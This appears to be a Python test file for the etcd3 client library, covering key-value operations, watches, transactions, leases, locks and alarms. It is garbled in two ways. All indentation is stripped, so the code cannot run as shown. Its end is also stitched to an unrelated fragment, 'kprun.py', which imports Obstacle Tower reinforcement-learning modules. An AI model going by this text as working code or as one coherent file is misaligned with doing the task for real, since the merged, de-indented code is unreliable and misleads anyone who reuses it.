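#       returned, _ = etcd.get('/doot/a_key', serializable=True)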
class TestEtcd3(object):
class MockedException(grpc.RpcError):
def __init__(self, code):
self._code = code
def code(self):
return self._code
@pytest.fixture
def etcd(self):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
timeout = 5
if endpoint:
url = urlparse(endpoint)
with etcd3.client(host=url.hostname,
port=url.port,
timeout=timeout) as client:
yield client
else:
with etcd3.client() as client:
yield client
@retry(wait=wait_fixed(2), stop=stop_after_attempt(3))
def delete_keys_definitely():
# clean up after fixture goes out of scope
etcdctl('del', '--prefix', '/')
out = etcdctl('get', '--prefix', '/')
assert 'kvs' not in out
delete_keys_definitely()
def test_get_unknown_key(self, etcd):
value, meta = etcd.get('probably-invalid-key')
assert value is None
assert meta is None
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_key(self, etcd, string):
etcdctl('put', '/doot/a_key', string)
returned, _ = etcd.get('/doot/a_key')
assert returned == string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_random_key(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
returned, _ = etcd.get('/doot/' + string)
assert returned == b'dootdoot'
@given(
characters(blacklist_categories=['Cs', 'Cc']),
characters(blacklist_categories=['Cs', 'Cc']),
)
def test_get_key_serializable(self, etcd, key, string):
etcdctl('put', '/doot/' + key, string)
with _out_quorum():
returned, _ = etcd.get('/doot/' + key, serializable=True)
assert returned == string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_have_cluster_revision(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
_, md = etcd.get('/doot/' + string)
assert md.response_header.revision > 0
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_key(self, etcd, string):
etcd.put('/doot/put_1', string)
out = etcdctl('get', '/doot/put_1')
assert base64.b64decode(out['kvs'][0]['value']) == \
string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_has_cluster_revision(self, etcd, string):
response = etcd.put('/doot/put_1', string)
assert response.header.revision > 0
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_has_prev_kv(self, etcd, string):
etcdctl('put', '/doot/put_1', 'old_value')
response = etcd.put('/doot/put_1', string, prev_kv=True)
assert response.prev_kv.value == b'old_value'
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_if_not_exists(self, etcd, string):
txn_status = etcd.put_if_not_exists('/doot/put_1', string)
assert txn_status is True
txn_status = etcd.put_if_not_exists('/doot/put_1', string)
assert txn_status is False
etcdctl('del', '/doot/put_1')
def test_delete_key(self, etcd):
etcdctl('put', '/doot/delete_this', 'delete pls')
v, _ = etcd.get('/doot/delete_this')
assert v == b'delete pls'
deleted = etcd.delete('/doot/delete_this')
assert deleted is True
deleted = etcd.delete('/doot/delete_this')
assert deleted is False
deleted = etcd.delete('/doot/not_here_dude')
assert deleted is False
v, _ = etcd.get('/doot/delete_this')
assert v is None
def test_delete_has_cluster_revision(self, etcd):
response = etcd.delete('/doot/delete_this', return_response=True)
assert response.header.revision > 0
def test_delete_has_prev_kv(self, etcd):
etcdctl('put', '/doot/delete_this', 'old_value')
response = etcd.delete('/doot/delete_this', prev_kv=True,
return_response=True)
assert response.prev_kvs[0].value == b'old_value'
def test_delete_keys_with_prefix(self, etcd):
etcdctl('put', '/foo/1', 'bar')
etcdctl('put', '/foo/2', 'baz')
v, _ = etcd.get('/foo/1')
assert v == b'bar'
v, _ = etcd.get('/foo/2')
assert v == b'baz'
response = etcd.delete_prefix('/foo')
assert response.deleted == 2
v, _ = etcd.get('/foo/1')
assert v is None
v, _ = etcd.get('/foo/2')
assert v is None
def test_new_watch_error(self, etcd):
# Trigger a failure while waiting on the new watch condition
with mock.patch.object(etcd.watcher._new_watch_cond, 'wait',
side_effect=ValueError):
with pytest.raises(ValueError):
etcd.watch('/foo')
# Ensure a new watch can be created
events, cancel = etcd.watch('/foo')
etcdctl('put', '/foo', '42')
next(events)
cancel()
def test_watch_key(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch', v)
out = etcdctl('get', '/doot/watch')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep so the watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch(b'/doot/watch')
for event in events_iterator:
assert event.key == b'/doot/watch'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel did not work, we would block in this for-loop forever
cancel()
t.join()
def test_watch_key_with_revision_compacted(self, etcd):
etcdctl('put', '/random', '1') # Some data to compact
def update_etcd(v):
etcdctl('put', '/watchcompation', v)
out = etcdctl('get', '/watchcompation')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep so the watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
def watch_compacted_revision_test():
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=1)
error_raised = False
compacted_revision = 0
try:
next(events_iterator)
except Exception as err:
error_raised = True
assert isinstance(err, etcd3.exceptions.RevisionCompactedError)
compacted_revision = err.compacted_revision
assert error_raised is True
assert compacted_revision == 2
change_count = 0
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=compacted_revision)
for event in events_iterator:
assert event.key == b'/watchcompation'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
cancel()
# Compact etcd and test watcher
etcd.compact(2)
watch_compacted_revision_test()
t.join()
def test_watch_exception_during_watch(self, etcd):
def pass_exception_to_callback(callback):
time.sleep(1)
callback(self.MockedException(grpc.StatusCode.UNAVAILABLE))
def add_callback_mock(*args, **kwargs):
callback = args[1]
t = threading.Thread(name="pass_exception_to_callback",
target=pass_exception_to_callback,
args=[callback])
t.start()
return 1
watcher_mock = mock.MagicMock()
watcher_mock.add_callback = add_callback_mock
etcd.watcher = watcher_mock
events_iterator, cancel = etcd.watch('foo')
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
for _ in events_iterator:
pass
def test_watch_timeout_on_establishment(self, etcd):
foo_etcd = etcd3.client(timeout=3)
def slow_watch_mock(*args, **kwargs):
time.sleep(4)
foo_etcd.watcher._watch_stub.Watch = slow_watch_mock # noqa
with pytest.raises(etcd3.exceptions.WatchTimedOut):
foo_etcd.watch('foo')
def test_watch_prefix(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep so the watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch_prefix('/doot/watch/prefix/')
for event in events_iterator:
assert event.key == \
utils.to_bytes('/doot/watch/prefix/{}'.format(change_count))
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel did not work, we would block in this for-loop forever
cancel()
t.join()
def test_watch_prefix_callback(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/callback/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/callback/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
            # sleep so that the watch can pick up the events
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
events = []
def callback(event):
events.extend(event.events)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
watch_id = etcd.add_watch_prefix_callback(
'/doot/watch/prefix/callback/', callback)
t.join()
etcd.cancel_watch(watch_id)
assert len(events) == 2
assert events[0].key.decode() == '/doot/watch/prefix/callback/0'
assert events[0].value.decode() == '0'
assert events[1].key.decode() == '/doot/watch/prefix/callback/1'
assert events[1].value.decode() == '1'
def test_watch_prefix_callback_with_filter(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/callback/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/callback/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def delete_etcd(v):
etcdctl('del', '/doot/watch/prefix/callback/' + v)
def update_key():
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
delete_etcd('1')
time.sleep(1)
events = []
def callback(event):
events.extend(event.events)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
watch_id = etcd.add_watch_prefix_callback(
'/doot/watch/prefix/callback/',
callback,
filters=[etcdrpc.WatchCreateRequest.FilterType.Value('NODELETE')]
)
t.join()
etcd.cancel_watch(watch_id)
assert len(events) == 2
assert events[0].key.decode() == '/doot/watch/prefix/callback/0'
assert events[0].value.decode() == '0'
assert events[1].key.decode() == '/doot/watch/prefix/callback/1'
assert events[1].value.decode() == '1'
def test_sequential_watch_prefix_once(self, etcd):
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
def test_watch_responses(self, etcd):
# Test watch_response & watch_once_response
revision = etcd.put('/doot/watch', '0').header.revision
etcd.put('/doot/watch', '1')
responses_iterator, cancel = \
etcd.watch_response('/doot/watch', start_revision=revision)
response_1 = next(responses_iterator)
cancel()
response_2 = etcd.watch_once_response('/doot/watch',
start_revision=revision)
for response in [response_1, response_2]:
count = 0
# check that the response contains the etcd revision
assert response.header.revision > 0
assert len(response.events) == 2
for event in response.events:
assert event.key == b'/doot/watch'
assert event.value == utils.to_bytes(str(count))
count += 1
# Test watch_prefix_response & watch_prefix_once_response
success_ops = [etcd.transactions.put('/doot/watch/prefix/0', '0'),
etcd.transactions.put('/doot/watch/prefix/1', '1')]
revision = etcd.transaction([], success_ops,
[])[1][0].response_put.header.revision
responses_iterator, cancel = \
etcd.watch_prefix_response('/doot/watch/prefix/',
start_revision=revision)
response_1 = next(responses_iterator)
cancel()
response_2 = etcd.watch_prefix_once_response('/doot/watch/prefix/',
start_revision=revision)
for response in [response_1, response_2]:
count = 0
assert response.header.revision == revision
assert len(response.events) == 2
for event in response.events:
assert event.key == \
utils.to_bytes('/doot/watch/prefix/{}'.format(count))
assert event.value == utils.to_bytes(str(count))
count += 1
def test_transaction_success(self, etcd):
etcdctl('put', '/doot/txn', 'dootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'success'
def test_transaction_failure(self, etcd):
etcdctl('put', '/doot/txn', 'notdootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'failure'
def test_ops_to_requests(self, etcd):
with pytest.raises(Exception):
etcd._ops_to_requests(['not_transaction_type'])
with pytest.raises(TypeError):
etcd._ops_to_requests(0)
@pytest.mark.skipif(etcd_version < 'v3.3',
reason="requires etcd v3.3 or higher")
def test_nested_transactions(self, etcd):
etcd.transaction(
compare=[],
success=[etcd.transactions.put('/doot/txn1', '1'),
etcd.transactions.txn(
compare=[],
success=[etcd.transactions.put('/doot/txn2', '2')],
failure=[])],
failure=[]
)
value, _ = etcd.get('/doot/txn1')
assert value == b'1'
value, _ = etcd.get('/doot/txn2')
assert value == b'2'
@pytest.mark.skipif(etcd_version < 'v3.3',
reason="requires etcd v3.3 or higher")
def test_transaction_range_conditions(self, etcd):
etcdctl('put', '/doot/key1', 'dootdoot')
etcdctl('put', '/doot/key2', 'notdootdoot')
range_end = utils.prefix_range_end(utils.to_bytes('/doot/'))
compare = [etcd.transactions.value('/doot/', range_end) == 'dootdoot']
status, _ = etcd.transaction(compare=compare, success=[], failure=[])
assert not status
etcdctl('put', '/doot/key2', 'dootdoot')
status, _ = etcd.transaction(compare=compare, success=[], failure=[])
assert status
def test_replace_success(self, etcd):
etcd.put('/doot/thing', 'toot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'doot'
assert status is True
def test_replace_fail(self, etcd):
etcd.put('/doot/thing', 'boot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'boot'
assert status is False
def test_get_prefix(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
values = list(etcd.get_prefix('/doot/range'))
assert len(values) == 20
for value, _ in values:
assert value == b'i am a range'
def test_get_prefix_keys_only(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
values = list(etcd.get_prefix('/doot/range', keys_only=True))
assert len(values) == 20
for value, meta in values:
assert meta.key.startswith(b"/doot/range")
assert not value
def test_get_prefix_serializable(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
with _out_quorum():
values = list(etcd.get_prefix(
'/doot/range', keys_only=True, serializable=True))
assert len(values) == 20
def test_get_prefix_error_handling(self, etcd):
with pytest.raises(TypeError, match="Don't use "):
etcd.get_prefix('a_prefix', range_end='end')
def test_get_range(self, etcd):
for char in string.ascii_lowercase:
if char < 'p':
etcdctl('put', '/doot/' + char, 'i am in range')
else:
etcdctl('put', '/doot/' + char, 'i am not in range')
values = list(etcd.get_range('/doot/a', '/doot/p'))
assert len(values) == 15
for value, _ in values:
assert value == b'i am in range'
def test_all_not_found_error(self, etcd):
result = list(etcd.get_all())
assert not result
def test_range_not_found_error(self, etcd):
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
result = list(etcd.get_prefix('/doot/range'))
assert not result
def test_get_all(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')
values = list(etcd.get_all())
assert len(values) == 25
for value, _ in values:
assert value == b'i am in all'
def test_get_all_keys_only(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')
values = list(etcd.get_all(keys_only=True))
assert len(values) == 25
for value, meta in values:
assert meta.key.startswith(b"/doot/")
assert not value
def test_sort_order(self, etcd):
def remove_prefix(string, prefix):
return string[len(prefix):]
initial_keys = 'abcde'
initial_values = 'qwert'
for k, v in zip(initial_keys, initial_values):
etcdctl('put', '/doot/{}'.format(k), v)
keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='ascend'):
keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert keys == initial_keys
reverse_keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='descend'):
reverse_keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert reverse_keys == ''.join(reversed(initial_keys))
def test_get_response(self, etcd):
etcdctl('put', '/foo/key1', 'value1')
etcdctl('put', '/foo/key2', 'value2')
response = etcd.get_response('/foo/key1')
assert response.header.revision > 0
assert response.count == 1
assert response.kvs[0].key == b'/foo/key1'
assert response.kvs[0].value == b'value1'
response = etcd.get_prefix_response('/foo/', sort_order='ascend')
assert response.header.revision > 0
assert response.count == 2
assert response.kvs[0].key == b'/foo/key1'
assert response.kvs[0].value == b'value1'
assert response.kvs[1].key == b'/foo/key2'
assert response.kvs[1].value == b'value2'
# Test that the response header is accessible even when the
# requested key or range of keys does not exist
etcdctl('del', '--prefix', '/foo/')
response = etcd.get_response('/foo/key1')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_prefix_response('/foo/')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_range_response('/foo/key1', '/foo/key3')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_all_response()
assert response.count == 0
assert response.header.revision > 0
def test_lease_grant(self, etcd):
lease = etcd.lease(1)
assert isinstance(lease.ttl, int_types)
assert isinstance(lease.id, int_types)
def test_lease_revoke(self, etcd):
lease = etcd.lease(1)
lease.revoke()
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_keys_empty(self, etcd):
lease = etcd.lease(1)
assert lease.keys == []
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_single_key(self, etcd):
lease = etcd.lease(1)
etcd.put('/doot/lease_test', 'this is a lease', lease=lease)
assert lease.keys == [b'/doot/lease_test']
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_expire(self, etcd):
key = '/doot/lease_test_expire'
lease = etcd.lease(1)
etcd.put(key, 'this is a lease', lease=lease)
assert lease.keys == [utils.to_bytes(key)]
v, _ = etcd.get(key)
assert v == b'this is a lease'
assert lease.remaining_ttl <= lease.granted_ttl
# wait for the lease to expire
time.sleep(lease.granted_ttl + 2)
v, _ = etcd.get(key)
assert v is None
def test_member_list(self, etcd):
assert len(list(etcd.members)) == 3
for member in etcd.members:
assert member.name.startswith('pifpaf')
for peer_url in member.peer_urls:
assert peer_url.startswith('http://')
for client_url in member.client_urls:
assert client_url.startswith('http://')
assert isinstance(member.id, int_types) is True
def test_lock_acquire(self, etcd):
lock = etcd.lock('lock-1', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.acquire(timeout=0) is False
assert lock.acquire(timeout=1) is False
def test_lock_release(self, etcd):
lock = etcd.lock('lock-2', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.release() is True
v, _ = etcd.get(lock.key)
assert v is None
assert lock.acquire() is True
assert lock.release() is True
assert lock.acquire(timeout=None) is True
def test_lock_expire(self, etcd):
lock = etcd.lock('lock-3', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# wait for the lease to expire
time.sleep(9)
v, _ = etcd.get(lock.key)
assert v is None
def test_lock_refresh(self, etcd):
lock = etcd.lock('lock-4', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# sleep for the same total time as test_lock_expire, but refresh each
# second
for _ in range(9):
time.sleep(1)
lock.refresh()
assert etcd.get(lock.key)[0] is not None
def test_lock_is_acquired(self, etcd):
lock1 = etcd.lock('lock-5', ttl=2)
assert lock1.is_acquired() is False
lock2 = etcd.lock('lock-5', ttl=2)
lock2.acquire()
assert lock2.is_acquired() is True
lock2.release()
lock3 = etcd.lock('lock-5', ttl=2)
lock3.acquire()
assert lock3.is_acquired() is True
assert lock2.is_acquired() is False
def test_lock_context_manager(self, etcd):
with etcd.lock('lock-6', ttl=2) as lock:
assert lock.is_acquired() is True
assert lock.is_acquired() is False
def test_lock_contended(self, etcd):
lock1 = etcd.lock('lock-7', ttl=2)
lock1.acquire()
lock2 = etcd.lock('lock-7', ttl=2)
lock2.acquire()
assert lock1.is_acquired() is False
assert lock2.is_acquired() is True
def test_lock_double_acquire_release(self, etcd):
lock = etcd.lock('lock-8', ttl=10)
assert lock.acquire(0) is True
assert lock.acquire(0) is False
assert lock.release() is True
def test_lock_acquire_none(self, etcd):
lock = etcd.lock('lock-9', ttl=10)
assert lock.acquire(None) is True
# This will succeed after 10 seconds since the TTL will expire and the
# lock is not refreshed
assert lock.acquire(None) is True
def test_lock_acquire_with_timeout(self, etcd):
lock1 = etcd.lock('lock-10', ttl=10)
lock2 = etcd.lock('lock-10', ttl=10)
original_watch = etcd.watch
watch_called = [0]
def release_lock_before_watch(*args, **kwargs):
watch_called[0] += 1
# Simulates the case where key is expired before watch is called.
# See https://github.com/kragniz/python-etcd3/issues/1107
lock1.release()
return original_watch(*args, **kwargs)
original_transaction = etcd.transaction
transaction_called = [0]
def transaction_wrapper(*args, **kwargs):
transaction_called[0] += 1
return original_transaction(*args, **kwargs)
assert lock1.acquire() is True
with mock.patch.object(etcd3.Etcd3Client, 'watch',
wraps=release_lock_before_watch):
with mock.patch.object(etcd3.Etcd3Client, 'transaction',
wraps=transaction_wrapper):
assert lock2.acquire(timeout=5) is True
# watch must be called only for lock2 once
assert watch_called[0] == 1
# transaction must be called once for lock1, twice for lock2
assert transaction_called[0] == 3
def test_internal_exception_on_internal_error(self, etcd):
exception = self.MockedException(grpc.StatusCode.INTERNAL)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.InternalServerError):
etcd.get("foo")
def test_connection_failure_exception_on_connection_failure(self, etcd):
exception = self.MockedException(grpc.StatusCode.UNAVAILABLE)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
etcd.get("foo")
def test_connection_timeout_exception_on_connection_timeout(self, etcd):
exception = self.MockedException(grpc.StatusCode.DEADLINE_EXCEEDED)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionTimeoutError):
etcd.get("foo")
def test_grpc_exception_on_unknown_code(self, etcd):
exception = self.MockedException(grpc.StatusCode.DATA_LOSS)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(grpc.RpcError):
etcd.get("foo")
def test_status_member(self, etcd):
status = etcd.status()
assert isinstance(status.leader, etcd3.members.Member) is True
assert status.leader.id in [m.id for m in etcd.members]
def test_hash(self, etcd):
assert isinstance(etcd.hash(), int)
def test_snapshot(self, etcd):
with tempfile.NamedTemporaryFile() as f:
etcd.snapshot(f)
f.flush()
etcdctl('snapshot', 'status', f.name)
class TestAlarms(object):
@pytest.fixture
def etcd(self):
etcd = etcd3.client()
yield etcd
etcd.disarm_alarm()
for m in etcd.members:
if m.active_alarms:
etcd.disarm_alarm(m.id)
def test_create_alarm_all_members(self, etcd):
alarms = etcd.create_alarm()
assert len(alarms) == 1
assert alarms[0].member_id == 0
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_create_alarm_specific_member(self, etcd):
a_member = next(etcd.members)
alarms = etcd.create_alarm(member_id=a_member.id)
assert len(alarms) == 1
assert alarms[0].member_id == a_member.id
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_list_alarms(self, etcd):
a_member = next(etcd.members)
etcd.create_alarm()
etcd.create_alarm(member_id=a_member.id)
possible_member_ids = [0, a_member.id]
alarms = list(etcd.list_alarms())
assert len(alarms) == 2
for alarm in alarms:
possible_member_ids.remove(alarm.member_id)
assert alarm.alarm_type == etcdrpc.NOSPACE
assert possible_member_ids == []
def test_disarm_alarm(self, etcd):
etcd.create_alarm()
assert len(list(etcd.list_alarms())) == 1
etcd.disarm_alarm()
assert len(list(etcd.list_alarms())) == 0
class TestUtils(object):
def test_prefix_range_end(self):
assert etcd3.utils.prefix_range_end(b'foo') == b'fop'
assert etcd3.utils.prefix_range_end(b'ab\xff') == b'ac\xff'
assert (etcd3.utils.prefix_range_end(b'a\xff\xff\xff\xff\xff')
== b'b\xff\xff\xff\xff\xff')
def test_to_bytes(self):
assert isinstance(etcd3.utils.to_bytes(b'doot'), bytes) is True
assert isinstance(etcd3.utils.to_bytes('doot'), bytes) is True
assert etcd3.utils.to_bytes(b'doot') == b'doot'
assert etcd3.utils.to_bytes('doot') == b'doot'
class TestEtcdTokenCallCredentials(object):
def test_token_callback(self):
e = EtcdTokenCallCredentials('foo')
callback = mock.MagicMock()
e(None, callback)
metadata = (('token', 'foo'),)
callback.assert_called_once_with(metadata, None)
class TestClient(object):
@pytest.fixture
def etcd(self):
yield etcd3.client()
def test_sort_target(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.KEY,
'key': etcdrpc.RangeRequest.KEY,
'version': etcdrpc.RangeRequest.VERSION,
'create': etcdrpc.RangeRequest.CREATE,
'mod': etcdrpc.RangeRequest.MOD,
'value': etcdrpc.RangeRequest.VALUE,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_target=input)
assert range_request.sort_target == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_target='feelsbadman')
def test_sort_order(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.NONE,
'ascend': etcdrpc.RangeRequest.ASCEND,
'descend': etcdrpc.RangeRequest.DESCEND,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_order=input)
assert range_request.sort_order == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_order='feelsbadman')
def test_secure_channel(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key="tests/client.key",
cert_cert="tests/client.crt"
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_only(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_and_key_raise_exception(self):
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key='tests/client.crt',
cert_cert=None)
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key=None,
cert_cert='tests/client.crt')
def test_compact(self, etcd):
etcd.compact(3)
with pytest.raises(grpc.RpcError):
etcd.compact(3)
def test_channel_with_no_cert(self):
client = etcd3.client(
ca_cert=None,
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is False
@mock.patch('etcdrpc.AuthStub')
def test_user_pwd_auth(self, auth_mock):
auth_resp_mock = mock.MagicMock()
auth_resp_mock.token = 'foo'
auth_mock.Authenticate = auth_resp_mock
self._enable_auth_in_etcd()
# Create a client using username and password auth
client = etcd3.client(
user='root',
password='pwd'
)
assert client.call_credentials is not None
self._disable_auth_in_etcd()
def test_user_or_pwd_auth_raises_exception(self):
with pytest.raises(Exception):
etcd3.client(user='usr')
with pytest.raises(Exception):
etcd3.client(password='pwd')
def _enable_auth_in_etcd(self):
subprocess.call(['etcdctl', '-w', 'json', 'user', 'add', 'root:pwd'])
subprocess.call(['etcdctl', 'auth', 'enable'])
def _disable_auth_in_etcd(self):
subprocess.call(['etcdctl', 'user', 'remove', 'root'])
subprocess.call(['etcdctl', '-u', 'root:pwd', 'auth', 'disable'])
class TestCompares(object):
def test_compare_version(self):
key = 'key'
tx = etcd3.Transactions()
version_compare = tx.version(key) == 1
assert version_compare.op == etcdrpc.Compare.EQUAL
version_compare = tx.version(key) != 2
assert version_compare.op == etcdrpc.Compare.NOT_EQUAL
version_compare = tx.version(key) < 91
assert version_compare.op == etcdrpc.Compare.LESS
version_compare = tx.version(key) > 92
assert version_compare.op == etcdrpc.Compare.GREATER
assert version_compare.build_message().target == \
etcdrpc.Compare.VERSION
def test_compare_value(self):
key = 'key'
tx = etcd3.Transactions()
value_compare = tx.value(key) == 'b'
assert value_compare.op == etcdrpc.Compare.EQUAL
value_compare = tx.value(key) != 'b'
assert value_compare.op == etcdrpc.Compare.NOT_EQUAL
value_compare = tx.value(key) < 'b'
assert value_compare.op == etcdrpc.Compare.LESS
value_compare = tx.value(key) > 'b'
assert value_compare.op == etcdrpc.Compare.GREATER
assert value_compare.build_message().target == etcdrpc.Compare.VALUE
def test_compare_mod(self):
key = 'key'
tx = etcd3.Transactions()
mod_compare = tx.mod(key) == -100
assert mod_compare.op == etcdrpc.Compare.EQUAL
mod_compare = tx.mod(key) != -100
assert mod_compare.op == etcdrpc.Compare.NOT_EQUAL
mod_compare = tx.mod(key) < 19
assert mod_compare.op == etcdrpc.Compare.LESS
mod_compare = tx.mod(key) > 21
assert mod_compare.op == etcdrpc.Compare.GREATER
assert mod_compare.build_message().target == etcdrpc.Compare.MOD
def test_compare_create(self):
key = 'key'
tx = etcd3.Transactions()
create_compare = tx.create(key) == 10
assert create_compare.op == etcdrpc.Compare.EQUAL
create_compare = tx.create(key) != 10
assert create_compare.op == etcdrpc.Compare.NOT_EQUAL
create_compare = tx.create(key) < 155
assert create_compare.op == etcdrpc.Compare.LESS
create_compare = tx.create(key) > -12
assert create_compare.op == etcdrpc.Compare.GREATER
assert create_compare.build_message().target == etcdrpc.Compare.CREATE
|
kprun.py
|
from obstacle_tower_env import ObstacleTowerEnv
# Parameter configuration files
# from keepitpossible.common import gcp_parameters
from keepitpossible.common import pc_parameters
# RL models
from keepitpossible.model import dppo_model
from keepitpossible.model import ex_dppo_model
# Multi-worker support
from keepitpossible import dppo_worker
import numpy as np
import tensorflow as tf
import os
import threading
import queue
# Use the first GPU (a 1080 card)
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
